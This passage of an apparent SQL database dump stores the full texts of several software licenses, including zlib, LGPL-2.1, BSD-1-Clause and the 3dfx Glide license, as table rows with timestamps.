indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n 13. MULTIPLE-LICENSED CODE.\n\nInitial Developer may designate portions of the Covered Code as \"Multiple-Licensed\".\n\"Multiple-Licensed\" means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the NPL or the alternative\nlicenses, if any, specified by the Initial Developer in the file described\nin Exhibit A. EXHIBIT A - Netizen Open Source License\n\n``The contents of this file are subject to the Netizen Open Source License\nVersion 1.0 (the \"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at http://netizen.com.au/licenses/NOPL/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is ______________________________________.\n\nThe Initial Developer of the Original Code is ________________________. Portions\ncreated by ______________________ are Copyright (C) ______ _______________________.\nAll Rights Reserved.\n\nContributor(s): ______________________________________.\n\nAlternatively, the contents of this file may be used under the terms of the\n_____ license (the \"[___] License\"), in which case the provisions of [______]\nLicense are applicable instead of those above. If you wish to allow use of\nyour version of this file only under the terms of the [____] License and not\nto allow others to use your version of this file under the NOSL, indicate\nyour decision by deleting the provisions above and replace them with the notice\nand other provisions required by the [___] License. If you do not delete the\nprovisions above, a recipient may use your version of this file under either\nthe NOSL or the [___] License.\"\n\n[NOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.]\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(219,'Zlib','zlib License Copyright (c) <year> <copyright holders>\n\nThis software is provided \'as-is\', without any express or implied warranty.\nIn no event will the authors be held liable for any damages arising from the\nuse of this software.\n\nPermission is granted to anyone to use this software for any purpose, including\ncommercial applications, and to alter it and redistribute it freely, subject\nto the following restrictions:\n\n1. The origin of this software must not be misrepresented; you must not claim\nthat you wrote the original software. If you use this software in a product,\nan acknowledgment in the product documentation would be appreciated but is\nnot required.\n\n2. Altered source versions must be plainly marked as such, and must not be\nmisrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source distribution.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(220,'LGPL-2.1-only','GNU LESSER GENERAL PUBLIC LICENSE\n\nVersion 2.1, February 1999\n\nCopyright (C) 1991, 1999 Free Software Foundation, Inc.\n\n51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n[This is the first released version of the Lesser GPL. It also counts as the\nsuccessor of the GNU Library Public License, version 2, hence the version\nnumber 2.1.]\n\nPreamble\n\nThe licenses for most software are designed to take away your freedom to share\nand change it. By contrast, the GNU General Public Licenses are intended to\nguarantee your freedom to share and change free software--to make sure the\nsoftware is free for all its users.\n\nThis license, the Lesser General Public License, applies to some specially\ndesignated software packages--typically libraries--of the Free Software Foundation\nand other authors who decide to use it. You can use it too, but we suggest\nyou first think carefully about whether this license or the ordinary General\nPublic License is the better strategy to use in any particular case, based\non the explanations below.\n\nWhen we speak of free software, we are referring to freedom of use, not price.\nOur General Public Licenses are designed to make sure that you have the freedom\nto distribute copies of free software (and charge for this service if you\nwish); that you receive source code or can get it if you want it; that you\ncan change the software and use pieces of it in new free programs; and that\nyou are informed that you can do these things.\n\nTo protect your rights, we need to make restrictions that forbid distributors\nto deny you these rights or to ask you to surrender these rights. These restrictions\ntranslate to certain responsibilities for you if you distribute copies of\nthe library or if you modify it.\n\nFor example, if you distribute copies of the library, whether gratis or for\na fee, you must give the recipients all the rights that we gave you. You must\nmake sure that they, too, receive or can get the source code. If you link\nother code with the library, you must provide complete object files to the\nrecipients, so that they can relink them with the library after making changes\nto the library and recompiling it. And you must show them these terms so they\nknow their rights.\n\nWe protect your rights with a two-step method: (1) we copyright the library,\nand (2) we offer you this license, which gives you legal permission to copy,\ndistribute and/or modify the library.\n\nTo protect each distributor, we want to make it very clear that there is no\nwarranty for the free library. Also, if the library is modified by someone\nelse and passed on, the recipients should know that what they have is not\nthe original version, so that the original author\'s reputation will not be\naffected by problems that might be introduced by others.\n\nFinally, software patents pose a constant threat to the existence of any free\nprogram. We wish to make sure that a company cannot effectively restrict the\nusers of a free program by obtaining a restrictive license from a patent holder.\nTherefore, we insist that any patent license obtained for a version of the\nlibrary must be consistent with the full freedom of use specified in this\nlicense.\n\nMost GNU software, including some libraries, is covered by the ordinary GNU\nGeneral Public License. This license, the GNU Lesser General Public License,\napplies to certain designated libraries, and is quite different from the ordinary\nGeneral Public License. We use this license for certain libraries in order\nto permit linking those libraries into non-free programs.\n\nWhen a program is linked with a library, whether statically or using a shared\nlibrary, the combination of the two is legally speaking a combined work, a\nderivative of the original library. The ordinary General Public License therefore\npermits such linking only if the entire combination fits its criteria of freedom.\nThe Lesser General Public License permits more lax criteria for linking other\ncode with the library.\n\nWe call this license the \"Lesser\" General Public License because it does Less\nto protect the user\'s freedom than the ordinary General Public License. It\nalso provides other free software developers Less of an advantage over competing\nnon-free programs. These disadvantages are the reason we use the ordinary\nGeneral Public License for many libraries. However, the Lesser license provides\nadvantages in certain special circumstances.\n\nFor example, on rare occasions, there may be a special need to encourage the\nwidest possible use of a certain library, so that it becomes a de-facto standard.\nTo achieve this, non-free programs must be allowed to use the library. A more\nfrequent case is that a free library does the same job as widely used non-free\nlibraries. In this case, there is little to gain by limiting the free library\nto free software only, so we use the Lesser General Public License.\n\nIn other cases, permission to use a particular library in non-free programs\nenables a greater number of people to use a large body of free software. For\nexample, permission to use the GNU C Library in non-free programs enables\nmany more people to use the whole GNU operating system, as well as its variant,\nthe GNU/Linux operating system.\n\nAlthough the Lesser General Public License is Less protective of the users\'\nfreedom, it does ensure that the user of a program that is linked with the\nLibrary has the freedom and the wherewithal to run that program using a modified\nversion of the Library.\n\nThe precise terms and conditions for copying, distribution and modification\nfollow. Pay close attention to the difference between a \"work based on the\nlibrary\" and a \"work that uses the library\". The former contains code derived\nfrom the library, whereas the latter must be combined with the library in\norder to run.\n\nTERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION\n\n0. This License Agreement applies to any software library or other program\nwhich contains a notice placed by the copyright holder or other authorized\nparty saying it may be distributed under the terms of this Lesser General\nPublic License (also called \"this License\"). Each licensee is addressed as\n\"you\".\n\nA \"library\" means a collection of software functions and/or data prepared\nso as to be conveniently linked with application programs (which use some\nof those functions and data) to form executables.\n\nThe \"Library\", below, refers to any such software library or work which has\nbeen distributed under these terms. A \"work based on the Library\" means either\nthe Library or any derivative work under copyright law: that is to say, a\nwork containing the Library or a portion of it, either verbatim or with modifications\nand/or translated straightforwardly into another language. (Hereinafter, translation\nis included without limitation in the term \"modification\".)\n\n\"Source code\" for a work means the preferred form of the work for making modifications\nto it. For a library, complete source code means all the source code for all\nmodules it contains, plus any associated interface definition files, plus\nthe scripts used to control compilation and installation of the library.\n\nActivities other than copying, distribution and modification are not covered\nby this License; they are outside its scope. The act of running a program\nusing the Library is not restricted, and output from such a program is covered\nonly if its contents constitute a work based on the Library (independent of\nthe use of the Library in a tool for writing it). Whether that is true depends\non what the Library does and what the program that uses the Library does.\n\n1. You may copy and distribute verbatim copies of the Library\'s complete source\ncode as you receive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice and disclaimer\nof warranty; keep intact all the notices that refer to this License and to\nthe absence of any warranty; and distribute a copy of this License along with\nthe Library.\n\nYou may charge a fee for the physical act of transferring a copy, and you\nmay at your option offer warranty protection in exchange for a fee.\n\n2. You may modify your copy or copies of the Library or any portion of it,\nthus forming a work based on the Library, and copy and distribute such modifications\nor work under the terms of Section 1 above, provided that you also meet all\nof these conditions:\n\n a) The modified work must itself be a software library.\n\nb) You must cause the files modified to carry prominent notices stating that\nyou changed the files and the date of any change.\n\nc) You must cause the whole of the work to be licensed at no charge to all\nthird parties under the terms of this License.\n\nd) If a facility in the modified Library refers to a function or a table of\ndata to be supplied by an application program that uses the facility, other\nthan as an argument passed when the facility is invoked, then you must make\na good faith effort to ensure that, in the event an application does not supply\nsuch function or table, the facility still operates, and performs whatever\npart of its purpose remains meaningful.\n\n(For example, a function in a library to compute square roots has a purpose\nthat is entirely well-defined independent of the application. Therefore, Subsection\n2d requires that any application-supplied function or table used by this function\nmust be optional: if the application does not supply it, the square root function\nmust still compute square roots.)\n\nThese requirements apply to the modified work as a whole. If identifiable\nsections of that work are not derived from the Library, and can be reasonably\nconsidered independent and separate works in themselves, then this License,\nand its terms, do not apply to those sections when you distribute them as\nseparate works. But when you distribute the same sections as part of a whole\nwhich is a work based on the Library, the distribution of the whole must be\non the terms of this License, whose permissions for other licensees extend\nto the entire whole, and thus to each and every part regardless of who wrote\nit.\n\nThus, it is not the intent of this section to claim rights or contest your\nrights to work written entirely by you; rather, the intent is to exercise\nthe right to control the distribution of derivative or collective works based\non the Library.\n\nIn addition, mere aggregation of another work not based on the Library with\nthe Library (or with a work based on the Library) on a volume of a storage\nor distribution medium does not bring the other work under the scope of this\nLicense.\n\n3. You may opt to apply the terms of the ordinary GNU General Public License\ninstead of this License to a given copy of the Library. To do this, you must\nalter all the notices that refer to this License, so that they refer to the\nordinary GNU General Public License, version 2, instead of to this License.\n(If a newer version than version 2 of the ordinary GNU General Public License\nhas appeared, then you can specify that version instead if you wish.) Do not\nmake any other change in these notices.\n\nOnce this change is made in a given copy, it is irreversible for that copy,\nso the ordinary GNU General Public License applies to all subsequent copies\nand derivative works made from that copy.\n\nThis option is useful when you wish to copy part of the code of the Library\ninto a program that is not a library.\n\n4. You may copy and distribute the Library (or a portion or derivative of\nit, under Section 2) in object code or executable form under the terms of\nSections 1 and 2 above provided that you accompany it with the complete corresponding\nmachine-readable source code, which must be distributed under the terms of\nSections 1 and 2 above on a medium customarily used for software interchange.\n\nIf distribution of object code is made by offering access to copy from a designated\nplace, then offering equivalent access to copy the source code from the same\nplace satisfies the requirement to distribute the source code, even though\nthird parties are not compelled to copy the source along with the object code.\n\n5. A program that contains no derivative of any portion of the Library, but\nis designed to work with the Library by being compiled or linked with it,\nis called a \"work that uses the Library\". Such a work, in isolation, is not\na derivative work of the Library, and therefore falls outside the scope of\nthis License.\n\nHowever, linking a \"work that uses the Library\" with the Library creates an\nexecutable that is a derivative of the Library (because it contains portions\nof the Library), rather than a \"work that uses the library\". The executable\nis therefore covered by this License. Section 6 states terms for distribution\nof such executables.\n\nWhen a \"work that uses the Library\" uses material from a header file that\nis part of the Library, the object code for the work may be a derivative work\nof the Library even though the source code is not. Whether this is true is\nespecially significant if the work can be linked without the Library, or if\nthe work is itself a library. The threshold for this to be true is not precisely\ndefined by law.\n\nIf such an object file uses only numerical parameters, data structure layouts\nand accessors, and small macros and small inline functions (ten lines or less\nin length), then the use of the object file is unrestricted, regardless of\nwhether it is legally a derivative work. (Executables containing this object\ncode plus portions of the Library will still fall under Section 6.)\n\nOtherwise, if the work is a derivative of the Library, you may distribute\nthe object code for the work under the terms of Section 6. Any executables\ncontaining that work also fall under Section 6, whether or not they are linked\ndirectly with the Library itself.\n\n6. As an exception to the Sections above, you may also combine or link a \"work\nthat uses the Library\" with the Library to produce a work containing portions\nof the Library, and distribute that work under terms of your choice, provided\nthat the terms permit modification of the work for the customer\'s own use\nand reverse engineering for debugging such modifications.\n\nYou must give prominent notice with each copy of the work that the Library\nis used in it and that the Library and its use are covered by this License.\nYou must supply a copy of this License. If the work during execution displays\ncopyright notices, you must include the copyright notice for the Library among\nthem, as well as a reference directing the user to the copy of this License.\nAlso, you must do one of these things:\n\na) Accompany the work with the complete corresponding machine-readable source\ncode for the Library including whatever changes were used in the work (which\nmust be distributed under Sections 1 and 2 above); and, if the work is an\nexecutable linked with the Library, with the complete machine-readable \"work\nthat uses the Library\", as object code and/or source code, so that the user\ncan modify the Library and then relink to produce a modified executable containing\nthe modified Library. (It is understood that the user who changes the contents\nof definitions files in the Library will not necessarily be able to recompile\nthe application to use the modified definitions.)\n\nb) Use a suitable shared library mechanism for linking with the Library. A\nsuitable mechanism is one that (1) uses at run time a copy of the library\nalready present on the user\'s computer system, rather than copying library\nfunctions into the executable, and (2) will operate properly with a modified\nversion of the library, if the user installs one, as long as the modified\nversion is interface-compatible with the version that the work was made with.\n\nc) Accompany the work with a written offer, valid for at least three years,\nto give the same user the materials specified in Subsection 6a, above, for\na charge no more than the cost of performing this distribution.\n\nd) If distribution of the work is made by offering access to copy from a designated\nplace, offer equivalent access to copy the above specified materials from\nthe same place.\n\ne) Verify that the user has already received a copy of these materials or\nthat you have already sent this user a copy.\n\nFor an executable, the required form of the \"work that uses the Library\" must\ninclude any data and utility programs needed for reproducing the executable\nfrom it. However, as a special exception, the materials to be distributed\nneed not include anything that is normally distributed (in either source or\nbinary form) with the major components (compiler, kernel, and so on) of the\noperating system on which the executable runs, unless that component itself\naccompanies the executable.\n\nIt may happen that this requirement contradicts the license restrictions of\nother proprietary libraries that do not normally accompany the operating system.\nSuch a contradiction means you cannot use both them and the Library together\nin an executable that you distribute.\n\n7. You may place library facilities that are a work based on the Library side-by-side\nin a single library together with other library facilities not covered by\nthis License, and distribute such a combined library, provided that the separate\ndistribution of the work based on the Library and of the other library facilities\nis otherwise permitted, and provided that you do these two things:\n\na) Accompany the combined library with a copy of the same work based on the\nLibrary, uncombined with any other library facilities. This must be distributed\nunder the terms of the Sections above.\n\nb) Give prominent notice with the combined library of the fact that part of\nit is a work based on the Library, and explaining where to find the accompanying\nuncombined form of the same work.\n\n8. You may not copy, modify, sublicense, link with, or distribute the Library\nexcept as expressly provided under this License. Any attempt otherwise to\ncopy, modify, sublicense, link with, or distribute the Library is void, and\nwill automatically terminate your rights under this License. However, parties\nwho have received copies, or rights, from you under this License will not\nhave their licenses terminated so long as such parties remain in full compliance.\n\n9. You are not required to accept this License, since you have not signed\nit. However, nothing else grants you permission to modify or distribute the\nLibrary or its derivative works. These actions are prohibited by law if you\ndo not accept this License. Therefore, by modifying or distributing the Library\n(or any work based on the Library), you indicate your acceptance of this License\nto do so, and all its terms and conditions for copying, distributing or modifying\nthe Library or works based on it.\n\n10. Each time you redistribute the Library (or any work based on the Library),\nthe recipient automatically receives a license from the original licensor\nto copy, distribute, link with or modify the Library subject to these terms\nand conditions. You may not impose any further restrictions on the recipients\'\nexercise of the rights granted herein. You are not responsible for enforcing\ncompliance by third parties with this License.\n\n11. If, as a consequence of a court judgment or allegation of patent infringement\nor for any other reason (not limited to patent issues), conditions are imposed\non you (whether by court order, agreement or otherwise) that contradict the\nconditions of this License, they do not excuse you from the conditions of\nthis License. If you cannot distribute so as to satisfy simultaneously your\nobligations under this License and any other pertinent obligations, then as\na consequence you may not distribute the Library at all. For example, if a\npatent license would not permit royalty-free redistribution of the Library\nby all those who receive copies directly or indirectly through you, then the\nonly way you could satisfy both it and this License would be to refrain entirely\nfrom distribution of the Library.\n\nIf any portion of this section is held invalid or unenforceable under any\nparticular circumstance, the balance of the section is intended to apply,\nand the section as a whole is intended to apply in other circumstances.\n\nIt is not the purpose of this section to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis section has the sole purpose of protecting the integrity of the free\nsoftware distribution system which is implemented by public license practices.\nMany people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing to\ndistribute software through any other system and a licensee cannot impose\nthat choice.\n\nThis section is intended to make thoroughly clear what is believed to be a\nconsequence of the rest of this License.\n\n12. If the distribution and/or use of the Library is restricted in certain\ncountries either by patents or by copyrighted interfaces, the original copyright\nholder who places the Library under this License may add an explicit geographical\ndistribution limitation excluding those countries, so that distribution is\npermitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n\n13. The Free Software Foundation may publish revised and/or new versions of\nthe Lesser General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Library specifies\na version number of this License which applies to it and \"any later version\",\nyou have the option of following the terms and conditions either of that version\nor of any later version published by the Free Software Foundation. If the\nLibrary does not specify a license version number, you may choose any version\never published by the Free Software Foundation.\n\n14. If you wish to incorporate parts of the Library into other free programs\nwhose distribution conditions are incompatible with these, write to the author\nto ask for permission. For software which is copyrighted by the Free Software\nFoundation, write to the Free Software Foundation; we sometimes make exceptions\nfor this. Our decision will be guided by the two goals of preserving the free\nstatus of all derivatives of our free software and of promoting the sharing\nand reuse of software generally.\n\n NO WARRANTY\n\n15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR\nTHE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE\nSTATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY\n\"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Libraries\n\nIf you develop a new library, and you want it to be of the greatest possible\nuse to the public, we recommend making it free software that everyone can\nredistribute and change. You can do so by permitting redistribution under\nthese terms (or, alternatively, under the terms of the ordinary General Public\nLicense).\n\nTo apply these terms, attach the following notices to the library. It is safest\nto attach them to the start of each source file to most effectively convey\nthe exclusion of warranty; and each file should have at least the \"copyright\"\nline and a pointer to where the full notice is found.\n\n< one line to give the library\'s name and an idea of what it does. >\n\nCopyright (C) < year > < name of author >\n\nThis library is free software; you can redistribute it and/or modify it under\nthe terms of the GNU Lesser General Public License as published by the Free\nSoftware Foundation; either version 2.1 of the License, or (at your option)\nany later version.\n\nThis library is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more\ndetails.\n\nYou should have received a copy of the GNU Lesser General Public License along\nwith this library; if not, write to the Free Software Foundation, Inc., 51\nFranklin Street, Fifth Floor, Boston, MA 02110-1301 USA Also add information\non how to contact you by electronic and paper mail.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the library, if necessary. Here\nis a sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in\n\nthe library `Frob\' (a library for tweaking knobs) written\n\nby James Random Hacker.\n\n< signature of Ty Coon > , 1 April 1990\n\nTy Coon, President of Vice\n\nThat\'s all there is to it!\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(221,'BSD-1-Clause','Copyright (c) <year> <owner> All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\nTHIS SOFTWARE IS PROVIDED BY Berkeley Software Design, Inc. \"AS IS\" AND ANY\nEXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\nIN NO EVENT SHALL Berkeley Software Design, Inc. BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(222,'Glide','3DFX GLIDE Source Code General Public License\n\n 1. PREAMBLE\n\nThis license is for software that provides a 3D graphics application program\ninterface (API).The license is intended to offer terms similar to some standard\nGeneral Public Licenses designed to foster open standards and unrestricted\naccessibility to source code. Some of these licenses require that, as a condition\nof the license of the software, any derivative works (that is, new software\nwhich is a work containing the original program or a portion of it) must be\navailable for general use, without restriction other than for a minor transfer\nfee, and that the source code for such derivative works must likewise be made\navailable. The only restriction is that such derivative works must be subject\nto the same General Public License terms as the original work.\n\nThis 3dfx GLIDE Source Code General Public License differs from the standard\nlicenses of this type in that it does not require the entire derivative work\nto be made available under the terms of this license nor is the recipient\nrequired to make available the source code for the entire derivative work.\nRather, the license is limited to only the identifiable portion of the derivative\nwork that is derived from the licensed software. The precise terms and conditions\nfor copying, distribution and modification follow.\n\n 2. DEFINITIONS\n\n2.1 This License applies to any program (or other \"work\") which contains a\nnotice placed by the copyright holder saying it may be distributed under the\nterms of this 3dfx GLIDE Source Code General Public License.\n\n2.2 The term \"Program\" as used in this Agreement refers to 3DFX\'s GLIDE source\ncode and object code and any Derivative Work.\n\n2.3 \"Derivative Work\" means, for the purpose of the License, that portion\nof any work that contains the Program or the identifiable portion of a work\nthat is derived from the Program, either verbatim or with modifications and/or\ntranslated into another language, and that performs 3D graphics API operations.\nIt does not include any other portions of a work.\n\n2.4 \"Modifications of the Program\" means any work, which includes a Derivative\nWork, and includes the whole of such work.\n\n 2.5 \"License\" means this 3dfx GLIDE Source Code General Public License.\n\n2.6 The \"Source Code\" for a work means the preferred form of the work for\nmaking modifications to it. For an executable work, complete source code means\nall the source code for all modules it contains, any associated interface\ndefinition files, and the scripts used to control compilation and installation\nof the executable work.\n\n 2.7 \"3dfx\" means 3dfx Interactive, Inc.\n\n 3. LICENSED ACTIVITIES\n\n3.1 COPYING - You may copy and distribute verbatim copies of the Program\'s\nSource Code as you receive it, in any medium, subject to the provision of\nsection 3.3 and provided also that:\n\n(a) you conspicuously and appropriately publish on each copy an appropriate\ncopyright notice (3dfx Interactive, Inc. 1999), a notice that recipients who\nwish to copy, distribute or modify the Program can only do so subject to this\nLicense, and a disclaimer of warranty as set forth in section 5;\n\n(b) keep intact all the notices that refer to this License and to the absence\nof any warranty; and\n\n(c) do not make any use of the GLIDE trademark without the prior written permission\nof 3dfx, and\n\n(d) give all recipients of the Program a copy of this License along with the\nProgram or instructions on how to easily receive a copy of this License.\n\n3.2 MODIFICATION OF THE PROGRAM/DERIVATIVE WORKS - You may modify your copy\nor copies of the Program or any portion of it, and copy and distribute such\nmodifications subject to the provisions of section 3.3 and provided that you\nalso meet all of the following conditions:\n\n(a) you conspicuously and appropriately publish on each copy of a Derivative\nWork an appropriate copyright notice, a notice that recipients who wish to\ncopy, distribute or modify the Derivative Work can only do so subject to this\nLicense, and a disclaimer of warranty as set forth in section 5;\n\n(b) keep intact all the notices that refer to this License and to the absence\nof any warranty; and (c) give all recipients of the Derivative Work a copy\nof this License along with the Derivative Work or instructions on how to easily\nreceive a copy of this License.\n\n(d) You must cause the modified files of the Derivative Work to carry prominent\nnotices stating that you changed the files and the date of any change.\n\n(e) You must cause any Derivative Work that you distribute or publish to be\nlicensed at no charge to all third parties under the terms of this License.\n\n(f) You do not make any use of the GLIDE trademark without the prior written\npermission of 3dfx.\n\n(g) If the Derivative Work normally reads commands interactively when run,\nyou must cause it, when started running for such interactive use, to print\nor display an announcement as follows:\n\n\"COPYRIGHT 3DFX INTERACTIVE, INC. 1999, ALL RIGHTS RESERVED THIS SOFTWARE\nIS FREE AND PROVIDED \"AS IS,\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED\nOR IMPLIED. THERE IS NO RIGHT TO USE THE GLIDE TRADEMARK WITHOUT PRIOR WRITTEN\nPERMISSION OF 3DFX INTERACTIVE, INC. SEE THE 3DFX GLIDE GENERAL PUBLIC LICENSE\nFOR A FULL TEXT OF THE DISTRIBUTION AND NON-WARRANTY PROVISIONS (REQUEST COPY\nFROM INFO@3DFX.COM).\"\n\n(h) The requirements of this section 3.2 do not apply to the modified work\nas a whole but only to the Derivative Work. It is not the intent of this License\nto claim rights or contest your rights to work written entirely by you; rather,\nthe intent is to exercise the right to control the distribution of Derivative\nWorks.\n\n 3.3 DISTRIBUTION\n\n(a) All copies of the Program or Derivative Works which are distributed must\ninclude in the file headers the following language verbatim:\n\n\"THIS SOFTWARE IS SUBJECT TO COPYRIGHT PROTECTION AND IS OFFERED ONLY PURSUANT\nTO THE 3DFX GLIDE GENERAL PUBLIC LICENSE. THERE IS NO RIGHT TO USE THE GLIDE\nTRADEMARK WITHOUT PRIOR WRITTEN PERMISSION OF 3DFX INTERACTIVE, INC. A COPY\nOF THIS LICENSE MAY BE OBTAINED FROM THE DISTRIBUTOR OR BY CONTACTING 3DFX\nINTERACTIVE INC (info@3dfx.com). THIS PROGRAM. IS PROVIDED \"AS IS\" WITHOUT\nWARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED. SEE THE 3DFX GLIDE GENERAL\nPUBLIC LICENSE FOR A FULL TEXT OF THE NON-WARRANTY PROVISIONS.\n\nUSE, DUPLICATION OR DISCLOSURE BY THE GOVERNMENT IS SUBJECT TO RESTRICTIONS\nAS SET FORTH IN SUBDIVISION (C)(1)(II) OF THE RIGHTS IN TECHNICAL DATA AND\nCOMPUTER SOFTWARE CLAUSE AT DFARS 252.227-7013, AND/OR IN SIMILAR OR SUCCESSOR\nCLAUSES IN THE FAR, DOD OR NASA FAR SUPPLEMENT. UNPUBLISHED RIGHTS RESERVED\nUNDER THE COPYRIGHT LAWS OF THE UNITED STATES.\n\n COPYRIGHT 3DFX INTERACTIVE, INC. 1999, ALL RIGHTS RESERVED\"\n\n(b) You may distribute the Program or a Derivative Work in object code or\nexecutable form under the terms of Sections 3.1 and 3.2 provided that you\nalso do one of the following:\n\n(1) Accompany it with the complete corresponding machine-readable source code,\nwhich must be distributed under the terms of Sections 3.1 and 3.2; or,\n\n(2) Accompany it with a written offer, valid for at least three years, to\ngive any third party, for a charge no more than your cost of physically performing\nsource distribution, a complete machine-readable copy of the corresponding\nsource code, to be distributed under the terms of Sections 3.1 and 3.2 on\na medium customarily used for software interchange; or,\n\n(3) Accompany it with the information you received as to the offer to distribute\ncorresponding source code. (This alternative is allowed only for noncommercial\ndistribution and only if you received the program in object code or executable\nform with such an offer, in accord with Subsection 3.3(b)(2) above.)\n\n(c) The source code distributed need not include anything that is normally\ndistributed (in either source or binary form) with the major components (compiler,\nkernel, and so on) of the operating system on which the executable runs, unless\nthat component itself accompanies the executable code.\n\n(d) If distribution of executable code or object code is made by offering\naccess to copy from a designated place, then offering equivalent access to\ncopy the source code from the same place counts as distribution of the source\ncode, even though third parties are not compelled to copy the source along\nwith the object code.\n\n(e) Each time you redistribute the Program or any Derivative Work, the recipient\nautomatically receives a license from 3dfx and successor licensors to copy,\ndistribute or modify the Program and Derivative Works subject to the terms\nand conditions of the License. You may not impose any further restrictions\non the recipients\' exercise of the rights granted herein. You are not responsible\nfor enforcing compliance by third parties to this License.\n\n(f) You may not make any use of the GLIDE trademark without the prior written\npermission of 3dfx.\n\n(g) You may not copy, modify, sublicense, or distribute the Program or any\nDerivative Works except as expressly provided under this License. Any attempt\notherwise to copy, modify, sublicense or distribute the Program or any Derivative\nWorks is void, and will automatically terminate your rights under this License.\nHowever, parties who have received copies, or rights, from you under this\nLicense will not have their licenses terminated so long as such parties remain\nin full compliance.\n\n 4. MISCELLANEOUS\n\n4.1 Acceptance of this License is voluntary. By using, modifying or distributing\nthe Program or any Derivative Work, you indicate your acceptance of this License\nto do so, and all its terms and conditions for copying, distributing or modifying\nthe Program or works based on it. Nothing else grants you permission to modify\nor distribute the Program or Derivative Works and doing so without acceptance\nof this License is in violation of the U.S. and international copyright laws.\n\n4.2 If the distribution and/or use of the Program or Derivative Works is restricted\nin certain countries either by patents or by copyrighted interfaces, the original\ncopyright holder who places the Program under this License may add an explicit\ngeographical distribution limitation excluding those countries, so that distribution\nis permitted only in or among countries not thus excluded. In such case, this\nLicense incorporates the limitation as if written in the body of this License.\n\n4.3 This License is to be construed according to the laws of the State of\nCalifornia and you consent to personal jurisdiction in the State of California\nin the event it is necessary to enforce the provisions of this License.\n\n 5. NO WARRANTIES\n\n5.1 TO THE EXTENT PERMITTED BY APPLICABLE LAW, THERE IS NO WARRANTY FOR THE\nPROGRAM. OR DERIVATIVE WORKS THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE\nTHE 